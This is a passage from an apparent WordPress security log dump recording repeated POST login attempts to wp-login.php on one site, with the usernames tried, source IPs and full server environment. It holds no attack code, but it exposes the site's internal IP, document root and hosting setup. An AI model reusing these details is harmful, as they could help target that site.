07:10:33'),(95007,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55490\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746748204.8318729;s:12:\"REQUEST_TIME\";i:1746748204;}}','35.154.1.88',1,'2025-05-09 05:20:07','2025-05-10 07:10:33'),(95008,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55489\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746748206.734921;s:12:\"REQUEST_TIME\";i:1746748206;}}','35.154.1.88',1,'2025-05-09 05:20:08','2025-05-10 07:10:31'),(95009,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55488\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746748206.73402;s:12:\"REQUEST_TIME\";i:1746748206;}}','35.154.1.88',1,'2025-05-09 05:20:08','2025-05-10 07:10:32'),(95010,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55491\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746748207.6865439;s:12:\"REQUEST_TIME\";i:1746748207;}}','35.154.1.88',1,'2025-05-09 05:20:09','2025-05-10 07:10:34'),(95011,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53434\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.237.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746748508.6648431;s:12:\"REQUEST_TIME\";i:1746748508;}}','188.166.237.78',0,'2025-05-09 05:25:10','1970-01-01 00:00:00'),(95012,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60288\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746749106.9088099;s:12:\"REQUEST_TIME\";i:1746749106;}}','91.151.95.70',0,'2025-05-09 05:35:08','1970-01-01 00:00:00'),(95013,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63231\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746749524.6144481;s:12:\"REQUEST_TIME\";i:1746749524;}}','35.154.1.88',1,'2025-05-09 05:42:07','2025-05-10 07:10:33'),(95014,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63232\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746749524.613867;s:12:\"REQUEST_TIME\";i:1746749524;}}','35.154.1.88',1,'2025-05-09 05:42:07','2025-05-10 07:10:31'),(95015,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63230\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746749526.4165559;s:12:\"REQUEST_TIME\";i:1746749526;}}','35.154.1.88',1,'2025-05-09 05:42:08','2025-05-10 07:10:33'),(95016,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"123\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63229\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"123\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746749526.4158361;s:12:\"REQUEST_TIME\";i:1746749526;}}','35.154.1.88',1,'2025-05-09 05:42:08','2025-05-10 07:10:32'),(95017,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63233\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746749527.360178;s:12:\"REQUEST_TIME\";i:1746749527;}}','35.154.1.88',1,'2025-05-09 05:42:09','2025-05-10 07:10:34'),(95018,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49110\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"S